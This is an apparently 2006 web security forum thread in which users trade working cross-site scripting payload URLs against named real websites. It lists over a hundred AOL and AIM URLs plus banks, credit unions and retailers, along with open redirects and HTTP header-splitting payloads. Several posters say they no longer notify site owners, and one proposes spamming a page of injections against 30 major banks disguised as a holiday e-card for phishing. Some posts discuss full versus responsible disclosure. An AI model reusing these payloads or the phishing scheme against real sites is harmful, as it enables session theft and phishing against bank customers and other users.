I didn't find the first one anywhere through a search of google.com, and I remember the second one had to do with the "Did you mean" suggestion, so if I put in speelin"><scrpit>alret("XSS")</scrpit>speelin it would output Did you mean spelling"><script>alert("CSS")</script>spelling ? and not check its own output. (speelin on the beginning and end because it corrects/highlights everything between the spelling mistake.

I never thought about that before, I'll look around for another PoC somewhere.



Edited 1 time(s). Last edit at 11/16/2006 09:31PM by Ghozt.

haha somebody should hack that one neopets site. i remember when i had one a while back (4 years?) and they deleted my account. their security shouldn't be as high and restrictive as myspace. get yourself like a million points lol.

@adio: http://www.neopets.com/petcentral.phtml?%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

http://www.bestbuy.com/site/olspage.jsp?id=%22;alert('xss');//&type=category&categoryRep=cat01000
http://www.gnc.com/search/noResults.jsp?kw=%3Cscript%3Ealert('xss')%3C%2Fscript%3E
http://www.staples.com/webapp/wcs/stores/servlet/StaplesZipCodeAdd?ts=1163744783681&url=StaplesSearch?ts=1163744783672&keyword=%22%3E%3Cimg%20src=%22a%22%20onerror=%22alert('xss')%22%3E&errorUrl=searchnoresults&searchSumUrl=searchresultssummary&searchUnsumUrl=searchresults&categoryId=&searchClassId=&searchSessionState=&searchSkuCount=
http://cbs.sportsline.com/video/player?id=123439s&channel=')%2balert('xss
http://www.cbs.com/info/user_services/registration/forgot_login.php?email=%3Cscript%3Ealert('xss')%3C/script%3E
http://nbc.resultspage.com/search?ts=custom&p=Q&uid=&w=%22%3E%3Cimg%20src=a%20onerror=alert('xss')%3E
http://fuse.tv/search.php?PHPSESSID=ec5fc144849c02bda92b5578bbdab8e2&searchstring=%3Cscript%3Ealert('xss')%3C/script%3E&x=0&y=0
http://www.webmd.com/drugs/search.aspx?stype=drug&query=';alert('xss');//
http://www.webmd.com/click2.asp?redirect=javascript:alert('xss'%29
http://www.tenaciousdmovie.com/preview/rocktheinternet/rock_overhaul.php?r_url=%22%3E%3Cscript%3Ealert(String.fromCharCode(120,115,115))%3C/script%3E&r_name=Tenacious%20D&r_option=1&r_id=9059



Edited 5 time(s). Last edit at 11/17/2006 04:15AM by unsticky.

I want to add to the list but a question before I do so. Are you guys notifying the websites before you post on here? I feel like high profile sites such as banks, etc should be notified before xss holes are posted on a public forum where it could get in the wrong hands?

Thanks

Banks, paypal, visa, those kind of things I would first report. Maybe not a neopets flaw.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Since my cisco affaire in 2003 i never tell no one nothing anymore, most the time they won't listen and book you as a demon instead of an angel. Site owners should clap in their hands when they find the disclosure posted here, at least the guys here post them here, who knows who's actually doing it without any disclosure. Any respectable sysadmin would notice these kind of injections/exploits in their logs. my 2 cents on alerting them.

malorn: theirs two main ways of disclosing, full and responsible (although responsible is a bit of a misnomer).. full tells it to the public, responsible only to the vendor unless they don't fix it after a certain deadline. Each has valid arguments for why it's the better method so decide for yourself which to use.

i've tried responsible disclosure for a while .. and it's just a big headache and often goes ignored. It takes many times more time to track down their security's email address and send them an email than it does to find the flaw. So i personally don't notify anyone by default.. they'll have to earn that with prompt fixing of previous holes.

Currently, that includes a list of one - visa. They've fixed every hole i've sent them, within 24hours of receiving the email. That's quite impressive..

-maluc

With me its the same as maluc + jungsonn...
Just Yesterday i phoned a "WebDesign" - Company having - not kidding - XSS flaws within every single Page they coded (php ^.^). They told me they'd fix it, and i also sent them an email including the xss links, some have been fixed, the majority is still open _and_ they didnt even say ty :( I mean in the future i probably won't point out the flaws and just go abusing 'em ...

sry for my bad E , cheers

heh, you should see the email exchange i sent to ebay about and open redirect on their website .. which was actively being used for phishing (and still is).

http://cgi1.ebay.fr/aw-cgi/ebayISAPI.dll?RedirectEnter&partner=25047&loc=http://asdf.com
Still live two months later. in most domains except .com it seems

i'm not sure if my emails were ever even read by a human - i kept getting generic messages teaching me how to spot a spoof website =.=''

Edit: gave up after the fourth or fifth email..

-maluc



Edited 1 time(s). Last edit at 11/17/2006 01:34PM by maluc.

http://cbc.ca
Canadian Broadcasting Corporation (CBC)

And no I quit informing any site(s), of xss holes.
XSS does not seem to be a high priority for most of them.

So if there to lazy to fix'em I am to lazy to warm them.

./br0ken

http://global.yesasia.com/en/CountryRegion/RegionSelection.aspx?rtnp=Ij48c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ+PHg=

don't often run across base64 encoded ones..

-maluc

CitiMortgage:

http://www.citimortgage.com/Mortgage/Compare/PostCheckAndCompare.do?propertyCity=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E



Edited 1 time(s). Last edit at 11/17/2006 08:06PM by malorn.

USE Credit Union:

http://www.usecu.org/home/?pageLabel=home.home_sea&searchQuery=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E&x=4&y=9



Edited 5 time(s). Last edit at 11/17/2006 08:05PM by malorn.

Bank of the West:

https://employment.bankofthewest.com/ENG/candidates/default.cfm?szCategory=jobprofile&szOrderID=12478%22%3E%3Cscript%3Ealert('xss')%3C/script%3E&szConcept=1

U.S. Bank

https://appcenter.usbank.com/fastapp/FastAppRouter?requestCmdId=GOFAST&PRODUCT_CODE=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E&SPONSOR=8

it would be pretty effective to create a page with XSS injections for 30 major banks or so .. then spam the link - as say a 'holiday greeting e-card from Allie'

unfortunately they tend to timeout sessions really quick .. so maybe targetted attacks would be more effective

i'm not about to test both and compare ^^" .. but keep em coming

-maluc

Mountain America Credit Union

http://www.macu.com/home/ "><script>alert('xss');</script> in "Search" box.

Midwest United Credit Union

http://www.mwucu.com/cgi-bin/search/search.cgi "><script>alert('xss');</script> in "Search" box.

United Consumers Credit Union
http://www.unitedconsumerscu.com/result.php?Keywords=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&r=c%253EeX6qeHWlZ3%253Avd4Wu%255BYK%257BZ4VvZ3%253Au%2527tfbsdi%2560uzqf%253Etfbsdi%2527f%253Evt%253CVT%253C33%253C2%253C2%253C7363%253A9%253A%253Ctuzmf2%256033%252Fdtt%253C3%253Cjoufsdptnpt%2560joufsobm%2560e3s%2560efsq%253Cotjsfdpwfsz3%253Cotjsfdpwfsz3%253C26878%253C358%253A8%253Cdmfbo%253C%2527enybsht%253E14v4it%253AzpbVIWsUUDF%2560CUOOXLuVbMJdo5iDz33igvMhhP4QkHinJc.DNc8pfM3mO7enCt%257BfY9%257BIorlWlSms2%257Bh%255BkIqcUjXP%253AFKCsMRcRM%2560inumytrXx%2560BxRNQLMEhO%255Bsh%257BDIVMy3.l%257Bw1q9e1dSYUUXbj3GhkYGDLNUUl4TlwT8L8XV3nVdlMhllzjZRj%2560TEqG7UoxZkGrcw1rJgmbCpE%2560sQvJiScPSVF7olXDWWXXlFHEIK43IuJuYKd%253A%25603%255B%253ADXggm%253A%257BgorEOvvWKrwkCvwy%257BhRSrxPUPMuygMCJ8%2560%25604fgYchE%2560%25603.CtSBoXMJR%252F%252F&Submit=Go

United Credit Union (not an xss, but an error dump (possibly SQL Injectible))

http://www.unitedcu.org/mainpage.jsp?PageName=<script>alert('xss');</script>

Credit Union of Johnson County

https://www.cujc.org/home/?pageLabel=sch&searchQuery=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E

KU Credit Union
http://www.kucu.org/home/?pageLabel=search&searchQuery=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E

Arkansas Credit Union League

http://www.acul.org/ "><script>alert('xss');</script> in "E-Newsletter Sign Up" box.

Postal of Arkansas Credit Union (not xss but an error dump (possibly SQL Injectible)

http://www.postal.org/mainpage.jsp?PageName=<script>alert('xss');</script>


66 Federal Credit Union

http://www.66fcu.org/home/?pageLabel=search&searchQuery=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E



Edited 1 time(s). Last edit at 11/17/2006 10:32PM by sjensen.

https://apply2.capitalone.com/cof.jsp?s=0009629010%27%0Aalert%28%22XSS%22%29%0A%2F%2F
it filters semicolons.. but new-lines work instead ^^

and incase the 'apply2' is a dealbreaker for phishing.. all their other domains whitelist this one for redirecting.

http://www.capitalone.ca/redirect.php?dest=https://apply2.capitalone.com/cof.jsp?s=0009629010%27%0Aalert%28%22XSS%22%29%0A%2F%2F
http://www.capitalone.com/redirect.php?dest=https://apply2.capitalone.com/cof.jsp?s=0009629010%27%0Aalert%28%22XSS%22%29%0A%2F%2F
http://www.capitalone.co.uk/redirect.php?dest=https://apply2.capitalone.com/cof.jsp?s=0009629010%27%0Aalert%28%22XSS%22%29%0A%2F%2F
http://www.capitalonemortgages.com/redirect.php?dest=https://apply2.capitalone.com/cof.jsp?s=0009629010%27%0Aalert%28%22XSS%22%29%0A%2F%2F
etc..

-maluc

http://www.turkishdailynews.com.tr/search.php?q=%22%3E%3Cscript%3Ealert%28%27Hey+dude...%27%29%3B%3C%2Fscript%3E%3C%22&Submit=Search

OT: I posted one for turkisdailynews some posts above but nevertheless nice find =)

well, as long as it's a different hole, the more the merrier

-maluc

imperiaonline.org - online stategy game
cscoop.ca - Altern Savings
ratemyboobies.com - err um yeah ... not even I am sure why I tryed this one.
shoprogers.com - Rogers tel/cable/sell/internet/ect.

oh and http://www.getyourboobsout.com lets you inject JS into comments ... and thats not very good at all show cookie example

I am sending a email to support@getyourboobsout.com , I will update if anything of interest comes of this.

from broken's meta redirect: http://neoseeker.com/redirector.php?url=javascript:alert(String.fromCharCode(88,83,83%29%29

Edit: click-friendly link.

-maluc



Edited 1 time(s). Last edit at 12/12/2006 02:04PM by maluc.

Been watching this thread for awhile now and thought I would throw in another I found on compusa.com.

http://www.compusa.com/locations/default.asp?loctype=zip&locvalue=%22><script>alert('XSS')</script>

--zwerg

Welcome, zwerg! Nice find!

- RSnake
Gotta love it. http://ha.ckers.org

Gimme a break dudes... this is just insane.

http://www.snap.com/search.php#%22%3E%3Cscript%3Ealert('Gimme%20a%20break%20dudes...')%3Bdocument.location.replace('http://sla.ckers.org')%3B%3C%2Fscript%3E%3C%22

o.O use document.location='http://sla.ckers.org' .. .replace() doesn't work like that

but it's in a frame.. so top.document.location='http://sla.ckers.org' will do it.

good find though, you don't see many DOM based XSSes

-maluc

Kanatoko's website (and welcome to the forums):
http://www.jumperz.net/index.php?i=2&a=0&b='%3Cscript%3Ealert('xss')%3C/script%3E

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

I appologise for both the length of my post, and any entries that were already posted by either myself or others. What I do not appologise for is AOL's insecurity.
Note: No GoogleDorks or vulnerbility scanners were used to find these. All 113 were found by me by hand. Also, all of these worked as of yesterday, Saturday November 18th, 2006.

https://account.login.aol.com/opr/_cqr/opr/opr.psp?lang=');alert('xss');//
https://my.screenname.aol.com/_cqr/help/infoPopUp.jsp?loginError=');alert('xss');//
https://my.screenname.aol.com/_cqr/login/login.psp?mcState=initialized&sitedomain=startpage.aol.com&siteState=OrigUrl%3Dhttp%253A//www.aol.com/&i=');alert('xss');//
https://reg.my.screenname.aol.com/_cqr/help/infoPopUp.jsp?lang=');alert('xss');//&locale=us
https://reg.my.screenname.aol.com/_cqr/registration/initRegistration.psp?mcState=initialized&siteId=ae40_prod&authLev=1&siteState=&lang=');alert('xss');//&locale=us&uitype=flex&seamless=novl&createSn=1&mcAuth=%2FBcAG0Vb3lkAAPd%2BAZRo5UVb3pUIxuzjtrsVcKgAAA%3D%3D
http://about.aol.com/%22;alert('xss');// -- works on most single-word subdomains.
http://aolsvc.worldbook.aol.com/wb/Search?st1=%22%3Cscript%3Ealert('xss');%3C/script%3E
http://autos.aol.com/?ncid=';alert('xss');//
http://billmanagerplus.aol.com?icid=';alert('xss');//
http://blackvoices.aol.com/connect/talk/pagenotfound?404=';alert('xss');//
http://cta.aol.com/Pass?_open=true&_container=5&_language=en&D=05/04/2007&T=<script>alert('xss');</script>&_PID=7&CAT=1030&H=00&M=00&L=1440
http://diets.aol.com/dirmodule.adp?_did=91405&_dtype=csv&_dcookie=0&_dpath=diet_fitness,diet_fitness&_dsect=1&dirHeader=';%22%3E%3Cscript%3Ealert('xss');%3C/script%3E
http://diets.aol.com/dirmodule.adp?_did=91405&_dtype=csv&_dcookie=0&_dpath=_dpath=--%3E%3Cscript%3Ealert('xss');%3C/script%3E&_dsect=1
http://finance.aol.com/usw/quotes/charts?sym=&exch=USA!&pid=&tabs=charts&dr=&icid=';alert('xss');//
http://free.aol.com/tryaolfree/wr6_popups/popup.adp?exit_promo=571441&popupData=hasPopup=1&page=/tryaolfree/wr6_popups/popup.adp&creative=%22javascript:alert('xss');%22&url=%22;%7Dalert('xss');function%20a()%7Bf=%22
http://jobs.aol.com/article/_a/now-hiring-seasonal-retail-jobs/20061019144909990007?ncid=';alert('xss');//
http://messageboards.aol.com/aol/en_us/articles.php?boardId=557053&articleId=499&func=6&channel=%22%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E&filterRead=false&filterHidden=true&filterUnhidden=false
http://messageboards.aol.com/aol/en_us/search.php?search=%22%3E%3Cbody+onload%3D%22alert%28%27xss%27%29%22+&boardId=334522&channel=usfriendsandflirts&search_all=1&search_type=2
http://money.aol.com/?icid=';alert('xss');//
http://money.aol.com/banking/checking?icid=';alert('xss');//
http://money.aol.com/banking?icid=';alert('xss');//
http://money.aol.com/basics/index?icid=';alert('xss');//
http://money.aol.com/billmanager?icid=';alert('xss');//
http://money.aol.com/bp_retire?icid=';alert('xss');//
http://money.aol.com/calculators?icid=';alert('xss');//
http://money.aol.com/consreports/smartshopping?icid=';alert('xss');//
http://money.aol.com/creditdebt/cards?icid=';alert('xss');//
http://money.aol.com/creditdebt/debt?icid=';alert('xss');//
http://money.aol.com/creditdebt/identity?icid=';alert('xss');//
http://money.aol.com/creditdebt/reports?icid=';alert('xss');//
http://money.aol.com/financetalk?icid=';alert('xss');//
http://money.aol.com/insurance/auto?icid=';alert('xss');//
http://money.aol.com/insurance/health?icid=';alert('xss');//
http://money.aol.com/insurance/home?icid=';alert('xss');//
http://money.aol.com/insurance/life?icid=';alert('xss');//
http://money.aol.com/insurance?icid=';alert('xss');//
http://money.aol.com/investing/basics?icid=';alert('xss');//
http://money.aol.com/investing/choosebroker?icid=';alert('xss');//
http://money.aol.com/investing/etf?icid=';alert('xss');//
http://money.aol.com/investing/funds?icid=';alert('xss');//
http://money.aol.com/investing?icid=';alert('xss');//
http://money.aol.com/loans/auto?icid=';alert('xss');//
http://money.aol.com/loans/college?icid=';alert('xss');//
http://money.aol.com/loans/personal?icid=';alert('xss');//
http://money.aol.com/millionaire?icid=';alert('xss');//
http://money.aol.com/mortgage/refinancing?icid=';alert('xss');//
http://money.aol.com/mortgage?icid=';alert('xss');//
http://money.aol.com/news/press_release?icid=';alert('xss');//
http://money.aol.com/news/technology?icid=';alert('xss');//
http://money.aol.com/news?icid=';alert('xss');//
http://money.aol.com/pfhub?icid=';alert('xss');//
http://money.aol.com/retirement/401k?icid=';alert('xss');//
http://money.aol.com/retirement/403b?icid=';alert('xss');//
http://money.aol.com/retirement/basics?icid=';alert('xss');//
http://money.aol.com/retirement/ira?icid=';alert('xss');//
http://money.aol.com/retirement/living?icid=';alert('xss');//
http://money.aol.com/retirement?icid=';alert('xss');//
http://money.aol.com/savings?icid=';alert('xss');//
http://money.aol.com/specialshub?icid=';alert('xss');//
http://money.aol.com/tax/advice?icid=';alert('xss');//
http://money.aol.com/tax/basics?icid=';alert('xss');//
http://money.aol.com/tax/forms?icid=';alert('xss');//
http://money.aol.com/tax/online?icid=';alert('xss');//
http://money.aol.com/tax?icid=';alert('xss');//
http://money.aol.com/top5/archive?icid=';alert('xss');//
http://movies.aol.com/search/dvdresults.adp?query=%3Cscript%3Ealert('xss');%3C/script%3E
http://movies.aol.com/search/location-results?csz=%3Cscript%3Ealert('xss');%3C/script%3E
http://music.aol.com/search/artistresults.adp?_brndnm=bvmusic&_csnv=bvmusic&query=%22;alert('xss');//
http://news.aol.com/?cap=i-foot&photoid=20041203TOK39D.jpg&searchpage=';alert('xss');//&first=8
http://news.aol.com?icid=';alert('xss');//
http://peopleconnection.aol.com/journals/?sitedomain=journals.aol.com&authLev=1&siteState=';alert('xss');//
http://peopleconnection.aol.com/think-pink/?icid=pc:';alert('xss');//
http://pictures.aol.com/galleries/tags/%3Cscript%3Ealert('xss');%3C/script%3E
http://premiumservices.aol.com/index.jsp?p=faq&s=%22;alert(%22xss%22);//
http://publish.hometown.aol.com/_cqr/_edreg/ed_tos.adp?mturl=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E
http://realestate.aol.com/investment?icid='+alert('xss')//
http://ringtones.aol.com/mustSignIn.php?signInRedirect=%22%3E%3Cscript%3Ealert(String.fromCharCode(120,115,115))%3C/script%3E
http://shopping.aol.com/%22%3Balert%28%22xss%22%29%3B//-search-results/
http://smallbusiness.aol.com/grow?icid=';alert('xss');//
http://smallbusiness.aol.com/manage?icid=';alert('xss');//
http://smallbusiness.aol.com/start?icid=';alert('xss');//
http://smallbusiness.aol.com?icid=';alert('xss');//
http://tvshows.aol.com/show/-/%22;alert('xss');a=%22
http://us.video.aol.com/video.full.adp?mode=2&guideContext=65.72&pmmsid=1751047&restartUrl=';alert('xss');//
http://us.video.aol.com/video.index.adp?mode=1&pmmsid=1736875&franchise=';alert('xss');//
http://webcenter.polls.aol.com/modular.jsp?template=1177&view=94621&pollId=94704&channel=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E%3Ca%3E
http://webmaster.info.aol.com/cgi-bin/search.pl?term=%3Cimg%20src=a%20onerror=alert('xss')%20%3E
http://yellowpages.aol.com/main.adp?_dirnamesearch=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&_dirlocation=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&_diraddressloc=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&_dirchange=1&_diraction=main&_dircat=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E&_dirretpage=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E

http://developer.aim.com/?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E
http://www.aim.com/acronyms.adp?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E
http://www.aim.com/aimexpress.adp?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E
http://www.aim.com/chats.adp?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E
http://www.aim.com/didyouknow/groupedims.adp?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E
http://www.aim.com/download.adp?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E
http://www.aim.com/download.adp.old?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E
http://www.aim.com/emoticons.adp?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E
http://www.aim.com/fun/index.adp?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E
http://www.aim.com/get_aim/linux/latest_linux.adp?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E
http://www.aim.com/get_aim/mac/latest_macosx.adp?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E
http://www.aim.com/get_aim/win/latest_win.adp?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E
http://www.aim.com/get_aim/win/other_win.adp?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E
http://www.aim.com/help_faq/error_mess/winerrors_buddylist.adp?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E
http://www.aim.com/help_faq/gethelp.adp?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E
http://www.aim.com/help_faq/report.adp?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E
http://www.aim.com/help_faq/security/faq.adp?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E
http://www.aim.com/help_faq/starting_out/getstarted.adp?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E
http://www.aim.com/help_faq/using/index.adp?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E
http://www.aim.com/index.adp?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E
http://www.aim.com/international.adp?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E
http://www.aim.com/tos/tos.adp?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E
http://www.aim.com/tos/privacy_policy.adp?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E
http://www.aim.com/windows/plugins.adp?aolp=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E

Header Splitting:
http://www.aol.com/redir.adp?_e_t=ap&_a_v=2.0&_a_i=100124311x1099139803x1076741866&_url=%0D%0A%0D%0A%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E%3C%21%2D%2D
http://aimtoday.aim.com/redir.adp?at_spot=at_nav5.home.main_puccini.mid&url=%0d%0a%0d%0a%3Cscript%3Ealert('xss')%3C/script%3E



Edited 3 time(s). Last edit at 11/19/2006 08:16PM by unsticky.